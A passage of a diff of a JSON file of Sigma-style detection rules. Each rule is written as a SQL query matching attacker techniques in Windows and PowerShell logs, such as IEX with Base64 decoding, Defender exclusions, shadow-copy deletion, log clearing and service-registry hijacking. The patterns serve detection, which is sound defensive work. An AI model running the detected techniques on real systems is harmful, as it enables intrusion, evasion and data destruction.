LIKE '%iwr %' ESCAPE '\\') AND ScriptBlockText LIKE '%-Method %' ESCAPE '\\' AND (ScriptBlockText LIKE '% Put %' ESCAPE '\\' OR ScriptBlockText LIKE '% Post %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\runexehelper.exe' ESCAPE '\\')" ], - "filename": "posh_ps_upload.yml" + "filename": "proc_creation_win_lolbin_runexehelper.yml" }, { - "title": "Change User Agents with WebRequest", - "id": "d4488827-73af-4f8d-9244-7b7662ef046e", - "status": "experimental", - "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", - "author": "frack113", + "title": "Suspicious Call by Ordinal", + "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "status": "stable", + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", + "author": "Florian Roth (Nextron Systems)", "tags": [ - 
"attack.command_and_control", - "attack.t1071.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows control panel elements have been identified as source (mmc)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '%-UserAgent %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_invoke_webrequest_useragent.yml" + "filename": "proc_creation_win_rundll32_by_ordinal.yml" }, { - "title": "Suspicious X509Enrollment - Ps Script", - "id": "504d63cb-0dba-4d02-8531-e72981aace2c", + "title": "Suspicious PowerShell IEX Execution Patterns", + "id": "09576804-7a05-458e-a817-eb718ca91f54", "status": "experimental", - "description": "Detect use of X509Enrollment", - "author": "frack113", + "description": "Detects suspicious ways to run 
Invoke-Execution using IEX alias", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate administrative script" + "Legitimate scripts that use IEX" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR ScriptBlockText LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" ], - "filename": "posh_ps_x509enrollment.yml" + "filename": "proc_creation_win_powershell_iex_patterns.yml" }, { - "title": "Powershell LocalAccount Manipulation", - "id": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", + "title": "Potential Snatch Ransomware Activity", + "id": "5325945e-f1f0-406e-97b8-65104d393fff", + "status": "stable", + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1204" + ], + "falsepositives": [ + "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + ], + 
"level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_malware_snatch_ransomware.yml" + }, + { + "title": "Rar Usage with Password and Compression Level", + "id": "faa48cae-6b25-4f00-a094-08947fef582f", "status": "test", - "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", - "author": "frack113", + "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", + "author": "@ROxPinTeddy", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Disable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-LocalUser%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE 
'% a %' ESCAPE '\\'))" ], - "filename": "posh_ps_localuser.yml" + "filename": "proc_creation_win_rar_compression_with_password.yml" }, { - "title": "PowerShell WMI Win32_Product Install MSI", - "id": "91109523-17f0-4248-a800-f81d9e7c081d", - "status": "experimental", - "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", + "title": "Changing Existing Service ImagePath Value Via Reg.EXE", + "id": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", + "status": "test", + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.persistence", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-CimMethod %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName %' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Product %' ESCAPE '\\' AND ScriptBlockText LIKE '%-MethodName %' ESCAPE '\\' AND ScriptBlockText LIKE '%.msi%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '% ImagePath %' ESCAPE '\\' AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\'))" ], - "filename": "posh_ps_win32_product_install_msi.yml" 
+ "filename": "proc_creation_win_reg_service_imagepath_change.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell", - "id": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", - "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious GUP Usage", + "id": "0a4f6091-223b-41f6-8743-f322ec84930b", + "status": "test", + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (ScriptBlockText LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ScriptBlockText LIKE '%system.io.streamreader%' ESCAPE '\\') AND ScriptBlockText LIKE '%readtoend' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" ], - "filename": "posh_ps_invoke_obfuscation_via_compress.yml" + "filename": 
"proc_creation_win_gup_suspicious_execution.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", - "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "title": "Whoami.EXE Execution Anomaly", + "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the execution of whoami.exe with suspicious parent processes.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentImage = '') OR (ParentImage = '')))" ], - "filename": "posh_ps_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_whoami_parent_anomaly.yml" }, { - "title": "Suspicious Eventlog Clear", - "id": "0f017df3-8f5a-414f-ad6b-24aff1128278", + "title": "Powershell Defender Exclusion", + "id": "17769c90-230e-488b-a463-e05c08e9d48f", 
"status": "experimental", - "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070.001" + "attack.t1562.001" ], "falsepositives": [ - "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Clear-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Limit-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Clear-WinEvent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-MpPreference %' ESCAPE '\\' OR CommandLine LIKE '%Set-MpPreference %' ESCAPE '\\') AND (CommandLine LIKE '% -ExclusionPath %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionExtension %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionProcess %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionIpAddress %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_clear_eventlog.yml" + "filename": "proc_creation_win_powershell_defender_exclusion.yml" }, { - "title": "PowerShell ICMP Exfiltration", - "id": "4c4af3cd-2115-479c-8193-6b8bfce9001c", - "status": "test", - "description": "Detects Exfiltration Over Alternative Protocol - ICMP. 
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", - "author": "Bartlomiej Czyz @bczyz1, oscd.community", - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], + "title": "Suspicious Process Parents", + "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", + "status": "experimental", + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate usage of System.Net.NetworkInformation.Ping class" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.NetworkInformation.Ping%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Send(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (Image = '')))))" ], - "filename": "posh_ps_icmp_exfiltration.yml" + "filename": "proc_creation_win_susp_parents.yml" }, { - "title": "Testing Usage of Uncommonly Used 
Port", - "id": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", + "title": "Potential PowerShell Command Line Obfuscation", + "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", "status": "test", - "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", - "author": "frack113", + "description": "Detects the PowerShell command lines with special characters", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", "tags": [ - "attack.command_and_control", - "attack.t1571" + "attack.execution", + "attack.defense_evasion", + "attack.t1027", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative script" + "Amazon SSM Document Worker", + "Windows Defender ATP" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Test-NetConnection%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\' AND ScriptBlockText LIKE '%-port %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '% 443 %' ESCAPE '\\' OR ScriptBlockText LIKE '% 80 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*' OR CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*' OR CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*' OR CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT ((ParentImage LIKE 'C:\\\\Program 
Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\') OR ((CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" ], - "filename": "posh_ps_test_netconnection.yml" + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" }, { - "title": "Suspicious PowerShell Keywords", - "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", - "status": "test", - "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", - "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar)", + "title": "Add Insecure Download Source To Winget", + "id": "81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", + "status": "experimental", + "description": "Detects usage of winget to add a new insecure (http) download source.\nWinget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "False positives might occur if the users are unaware of such control checks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_keywords.yml" + "filename": "proc_creation_win_winget_add_insecure_custom_source.yml" }, { - "title": "Powershell Create Scheduled Task", - "id": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", - "status": "test", - "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", - "author": "frack113", + "title": "Download Arbitrary Files Via MSOHTMED.EXE", + "id": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "status": "experimental", + "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-ScheduledTaskAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskTrigger%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskPrincipal%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskSettingsSet%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-ScheduledTask%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Invoke-CimMethod%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PS\\_ScheduledTask%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSpace%' ESCAPE '\\' AND ScriptBlockText 
LIKE '%Root\\\\Microsoft\\\\Windows\\\\TaskScheduler%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSOHTMED.exe' ESCAPE '\\' OR OriginalFileName = 'MsoHtmEd.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_cmdlet_scheduled_task.yml" + "filename": "proc_creation_win_lolbin_msohtmed_download.yml" }, { - "title": "Root Certificate Installed - PowerShell", - "id": "42821614-9264-4761-acfc-5772c3286f76", - "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "title": "New User Created Via Net.EXE", + "id": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", + "status": "test", + "description": "Identifies the creation of local users via the net.exe command.", + "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + "Legitimate user creation.", + "Better use event IDs for user creation rather than command line rules." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Move-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Import-Certificate%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\'))" ], - "filename": "posh_ps_root_certificate_installed.yml" + "filename": "proc_creation_win_net_user_add.yml" }, { - "title": "PowerShell PSAttack", - "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "title": "Potential Privilege Escalation via Service Permissions Weakness", + "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "status": "test", - "description": "Detects the use of PSAttack PowerShell hack tool", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' 
ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" ], - "filename": "posh_ps_psattack.yml" + "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" }, { - "title": "Clear PowerShell History - PowerShell", - "id": "26b692dc-1722-49b2-b496-a8258aa6371d", - "status": "experimental", - "description": "Detects keywords that could indicate clearing PowerShell history", - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "Shadow Copies Deletion Using Operating Systems Utilities", + "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities", + "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ "attack.defense_evasion", - "attack.t1070.003" + "attack.impact", + "attack.t1070", + "attack.t1490" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", + "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%del%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND 
